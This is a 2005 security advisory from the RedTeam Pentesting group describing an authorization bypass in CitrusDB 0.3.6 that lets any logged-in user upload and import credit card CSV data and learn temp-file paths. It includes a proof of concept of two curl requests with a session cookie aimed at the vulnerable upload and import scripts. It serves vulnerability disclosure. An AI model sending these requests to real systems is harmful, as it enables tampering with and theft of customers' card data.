Kontakt

Kontaktieren Sie uns gerne

+49 241 510081-0
kontakt@redteam-pentesting.de
Kontaktformular
RedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting Header

Upload Authorization bypass in CitrusDB

RedTeam found an authorization bypass vulnerability in CitrusDB which results in upload of fake credit card data, SQL-Injection and disclosure of credit card data.

Details

  • Product: CitrusDB
  • Affected Version: 0.3.6 (verified), probably <=0.3.6
  • Immune Version: none (2005-01-30)
  • OS affected: all
  • Security-Risk: high
  • Remote-Exploit: yes
  • Vendor-URL: http://www.citrusdb.org
  • Vendor-Status: informed
  • Advisory-URL: https://www.redteam-pentesting.de/advisories/rt-sa-2005-003
  • Advisory-Status: public
  • CVE: CAN-2005-0409 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0409)

Introduction

Description from vendor:

“CitrusDB is an open source customer database application that uses PHP and a database backend (currently MySQL) to keep track of customer information, services, products, billing, and customer service information.”

In the credit card data upload/import scripts it is only checked whether or not a user is logged in but no privilege check is done.

More Details

In ./citrusdb/tools/importcc.php and ./citrusdb/tools/uploadcc.php no authorization is done. Any logged in user (or in combination with CAN-2005-0408 anybody) may upload a cvs file containing credit card data. He also gets knowledge of the path to the temporary file that stores the uploaded credit card data and may fetch additional uploaded credit card data (compare CAN-2005-0229) if the file is accessible via http. Additionally he may perform an SQL-Injection (compare CAN-2005-0410).

Proof of Concept

This uploads the file exploit.cvs.

curl -D - --cookie "id_hash=2378c7b70e77d9c6737d697a46cbe34b;
user_name=testor" http://<target>/citrusdb/tools/uploadcc.php --form
userfile=@exploit.cvs --form Import=Import

Note: The cookie has to be adjusted to an existing user.

This imports the file to the credit card database:

curl -D - --cookie "id_hash=2378c7b70e77d9c6737d697a46cbe34b;
user_name=testor"
"http://<target>/citrusdb/tools/index.php?load=importcc&submit=on"

Note: The cookie has to be adjusted to an existing user. No data will be imported if the cvs file is empty, the administrator probably wouldn’t notice that the temporary file is now empty but the attacker gets the path to the temporary file and may access data that is uploaded in the future if the path is inside document root (see CAN-2005-0229). An SQL-Injection is also possible (see CAN-2005-0410)

Workaround

Disable the upload of cvs data, e.g. by setting the path for the temporary cvs file ($path_to_ccfile) to a non-writeable directory.

Fix

n/a

Security Risk

The security risk is high because an attacker may corrupt important (credit card) data and an attack is very easy to perform.

History

  • 2005-02-04 Email sent to author
  • 2005-02-12 CVE number requested
  • 2005-02-14 posted as CAN-2005-0409
  • 2009-05-08 Updated Advisory URL

RedTeam

RedTeam is a penetration testing group working at the Laboratory for Dependable Distributed Systems at RWTH-Aachen University. You can find more information on the RedTeam Project at https://www.redteam-pentesting.de